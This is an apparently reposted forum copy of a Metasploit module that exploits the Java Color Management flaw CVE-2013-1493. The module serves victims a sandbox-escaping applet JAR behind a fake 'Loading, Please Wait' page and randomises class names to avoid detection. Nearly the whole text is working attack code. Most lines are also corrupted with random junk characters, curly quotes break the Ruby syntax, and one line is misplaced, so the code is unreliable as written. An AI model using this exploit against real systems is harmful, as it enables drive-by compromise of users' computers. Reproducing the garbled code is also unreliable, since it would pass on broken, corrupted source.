##
' T1 i$ k6 J( u2 g6 k$ [
/ u% O1 {/ D7 g4 y# This file is part of the Metasploit Framework and may be subject to ]/ s+ z+ [' N" }
# redistribution and commercial restrictions. Please see the Metasploit
1 N, ~% B3 i& Y0 J4 J3 ]$ m. y# web site for more information on licensing and terms of use.$ k* q: Q- u* f8 {& p8 G" H: k
# http://metasploit.com/
9 z- I% N% C2 r% E- f/ t- _##
, S) w6 i# b- g, u) a# s0 J7 Orequire ‘msf/core’
( j0 a: r2 d ~' H9 prequire ‘rex’
$ B# _# ~* X1 V b+ Y* z" w/ yclass Metasploit3 < Msf::Exploit::Remote
4 j5 C5 d" ?: j8 s5 IRank = NormalRanking1 a" e- |9 Q# c; V1 T
include Msf::Exploit::Remote::HttpServer::HTML
& w X: `$ z3 [( l' J/ Z- linclude Msf::Exploit::EXE' I& J1 t7 n/ M# c* u5 v/ l4 ^
include Msf::Exploit::Remote::BrowserAutopwn3 b. E7 T, Q9 X! _0 D% \% }1 T
autopwn_info({ :javascript => false })
+ `; \; v: E$ H6 M4 D* b! ?0 Qdef initialize( info = {} )4 i- @# M6 {3 N3 n/ U) i
super( update_info( info,8 V8 z" V4 o/ x
‘Name’ => ‘Java CMM Remote Code Execution’,
p5 ^- v' G& S/ E' z‘Description’ => %q{
+ i) X4 X8 r [$ s6 ^2 z5 |This module abuses the Color Management classes from a Java Applet to run1 N% N! r7 a: m2 p
arbitrary Java code outside of the sandbox as exploited in the wild in February
/ ~$ H$ \( g$ W# l* E. }and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41! v D2 u2 \' y. A" `
and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1: P& D4 e2 c0 T9 s& k6 ~
systems. This exploit doesn’t bypass click-to-play, so the user must accept the java
) Q! g9 {; s. u5 _0 lwarning in order to run the malicious applet.' [& M7 q$ W ~ b( t5 \: `
},
+ N/ \# x% R$ V: a5 ? J0 M: C‘License’ => MSF_LICENSE,
, J! }( v9 Y* G‘Author’ =>6 x# {8 U/ D7 g" e5 }5 m
'Unknown', # Vulnerability discovery and Exploit) ]7 a" y& o- q9 u
'juan vazquez' # Metasploit module (just ported the published exploit); _" H3 `& V0 m8 E' C0 n7 j
],
' v8 F4 `; i1 i( }2 d& G‘References’ =>
& P7 X& h+ w8 D( W[
, ]9 q0 `: G: k: \1 Z3 o[ 'CVE', '2013-1493' ],
1 u5 ]% W! n9 e[ 'OSVDB', '90737' ],
- G9 N0 H$ P) H5 w# v9 W0 j[ 'BID', '58238' ],
. i* Y6 W$ Y5 Y4 K7 l[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
% b( {/ H5 A7 j8 I2 B[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
' M. c/ L% }; W- v[ 'URL', 'http://pastie.org/pastes/6581034' ]
/ A- Y; c/ |) n1 Y: K( V],$ A. z( x1 B$ ^' c
‘Platform’ => [ 'win', 'java' ],
& n% ^5 k9 A- Y9 ]+ N! u‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },
$ @* C$ M9 y6 y9 p* v; q‘Targets’ =>
4 @( |6 b$ m X[
! g5 N6 g: Z6 V1 r" U[ 'Generic (Java Payload)', q) y! t% s, M8 s3 R B" J7 {3 [
{
! G7 E; {9 k) i3 W; P7 Q+ E6 x'Platform' => 'java',+ _& e# }. r; W9 N2 E3 S0 ]4 M( K
'Arch' => ARCH_JAVA( ^$ C+ \$ L) Y; z/ s% a0 h% _; A
}
, O! y, |* s: [, s$ y],: G- ]& U2 M, S- g& Q0 w
[ 'Windows x86 (Native Payload)',
( u6 @. U& B& o7 [6 L$ D{2 ]: v! P6 S5 y- T0 W# C% v
'Platform' => 'win',
# d1 y4 I$ ^4 W# {2 k- p'Arch' => ARCH_X86' D M6 Z1 J: o: B- e$ X! w
}9 V! P1 m6 M- }+ H; ?' e) _
]" d1 K& L: Q+ k* X1 T4 [
],3 v; x" s5 r+ [+ ~/ d- Z
‘‘DisclosureDate’ => ‘Mar 01 2013′& c# h$ L. A1 F8 U) r% j) [- i
))
- t& x% @* o& {1 X0 vend
2 }8 l. u5 L* u* vdef setup
1 Q& v7 p# d1 [path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)
3 y; B- m/ E1 s3 x; ?( c: [4 s& K9 k@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
" S8 z; G; S; u. F% lpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)
/ t3 D! p% o5 j8 w@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
/ D: @- Q- N* ppath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)3 |- z2 h. e2 q# R- H6 u
@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
2 h, v1 e+ E4 y8 Wpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)
8 c, y% m+ _+ G, g1 u9 o" o1 V@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }2 ^; t: Y8 S F+ j" P
@init_class_name = rand_text_alpha(“Init”.length)" j8 Y" u/ M7 s1 i9 M! w
@init_class.gsub!(“Init”, @init_class_name)
7 O# Z3 o& k4 @1 Z8 C7 Ysuper0 |' j" o+ C" j1 K; J5 ]& F
end) ^2 g5 J" p! ]+ m
def on_request_uri(cli, request)
5 h1 M6 E k% ~6 Tprint_status(“handling request for #{request.uri}”)
% U+ K9 X9 L* A) M5 Dcase request.uri
- ^' m7 w, \: N% Awhen /\.jar$/i4 Y) g0 n0 A; q! N! L3 V D, Q
jar = payload.encoded_jar
y7 V, Y3 h5 ?jar.add_file(“#{@init_class_name}.class”, @init_class)
: _; ?5 k4 C, x' N) }( `1 V) ?jar.add_file(“Leak.class”, @leak_class)
5 R; Z+ ^9 y) o% P X9 Ejar.add_file(“MyBufferedImage.class”, @buffered_image_class)
0 Y; r p0 C* e$ \" h/ x" i9 @; Z5 ~! F/ Qjar.add_file(“MyColorSpace.class”, @color_space_class)
4 J% T) G, ]2 l/ | I$ cDefaultTarget’ => 1,
. ]5 v( P4 W6 x* c, Ymetasploit_str = rand_text_alpha(“metasploit”.length)9 l; Q; Y2 w/ E9 R7 Z s; P
payload_str = rand_text_alpha(“payload”.length)
* L6 M1 k7 F! b4 c tjar.entries.each { |entry|; c+ I4 P7 C! K% j# k! ] D: T4 @
entry.name.gsub!(“metasploit”, metasploit_str)
1 Z" \; }6 \/ s% m3 @entry.name.gsub!(“Payload”, payload_str)( w6 _4 a# O/ L
entry.data = entry.data.gsub(“metasploit”, metasploit_str); N" ~, I1 C# ?! d, _% @
entry.data = entry.data.gsub(“Payload”, payload_str)' l& ~1 n5 l! ]( T5 l3 @# E# n
}/ p- u" m# T2 o+ D- y
jar.build_manifest1 G) K% K( V' d+ [
send_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” }): R6 q* \7 o6 g
when /\/$/
+ }0 m" I( Y' l/ y+ Q2 b! \payload = regenerate_payload(cli)
& M3 E: U! `/ M! g" k1 ?if not payload% L+ r/ j, l9 j# M
print_error(“Failed to generate the payload.”)' H+ V! r! S m# ]. ]' f
send_not_found(cli)
; Q. V4 x& M$ X3 Xreturn
* G. j7 Q0 N9 v4 oend
" X. I& s! \7 k8 y7 ysend_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })
E1 m; c" } D, {3 V7 belse
: `, K, U8 {3 i8 B1 g* t* Qsend_redirect(cli, get_resource() + ‘/’, ”)
0 V' s7 V1 g; ^& P/ [$ {+ [; Cend
% n+ U% l) A2 a5 K" Nend
) g3 Z4 y& d4 `7 F' tdef generate_html, ]: E' l4 o/ d! w$ L+ b, z/ u
html = %Q|<html><head><title>Loading, Please Wait…</title></head>|
: J( g7 v e$ `5 M7 w! Lhtml += %Q|<body><center><p>Loading, Please Wait…</p></center>|4 P+ Q2 c% ?: G* X
html += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|
$ q) d0 v, o2 a+ a% t3 s2 v/ \html += %Q|</applet></body></html>|
, y, J/ U! k6 Nreturn html/ B) I* G. L& Z. j+ I
end5 _! g; p; X0 b: c7 p m- Z/ W
end0 w* @: A3 W3 i$ o9 W# k
end) F1 _6 w! t" g/ s2 ~0 u' A% U
|
发表于 2013-4-4 17:31:17
收藏
支持
反对